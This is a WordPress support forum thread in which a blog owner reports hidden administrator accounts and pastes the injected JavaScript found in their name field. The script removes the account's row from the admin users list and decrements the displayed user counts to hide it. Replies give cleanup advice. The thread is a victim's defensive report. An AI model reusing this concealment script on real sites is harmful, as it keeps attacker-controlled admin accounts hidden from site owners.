WordPress.org

Ready to get started?Download WordPress

Forums

Authors Created Without My Knowledge (6 posts)

  1. scrooby
    Member
    Posted 5 years ago #

    Lo All,

    I am having the problem that authors are being created on my blog without me knowing. I had noticed a while back that some posts were being accepted without me doing so, which were what my settings were, but when I went to go list all the authors on my blogs homepage, it listed 2 hidden users that didn't come up in the 'users and authors' page in the admin section.

    I managed to find and get into these users and I found that it had this javascript in the name field:

    ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script>

    Is this some sort of javascript injection technique or are they auto generated users via WordPress?

    I'd really like to know how to block this as about 2 weeks after deleting the users, they have now appeared again. I currently have registration on the blog blocked so I have no idea how they're getting in?

  2. mrmist
    Forum Janitor
    Posted 5 years ago #

    What version of WordPress are you running?

    Since deleting the bogus users have you reset your blog and ftp passwords?

    Have you re-uploaded the WordPress source files to replace any hacked ones on your server?

  3. scrooby
    Member
    Posted 5 years ago #

    I'm currently running 2.8.1 and first time I did reset my passwords but not FTP.

    I'll also try and re-upload the WordPress files.

    Cheers for help...

  4. mrmist
    Forum Janitor
    Posted 5 years ago #

    Also take a look at hardening WordPress.

  5. Roy
    Member
    Posted 5 years ago #

    I guess you've been hacked and haven't cleaned up properly. Just upgrading might not rid you off the hack. Before looking at mrmist's link, look here and look for more information about cleaning up hacked sites, on this forum or elsewhere on the www.

  6. scrooby
    Member
    Posted 5 years ago #

    Cheers for the link, I'll have a look :)

Topic Closed

This topic has been closed to new replies.

About this Topic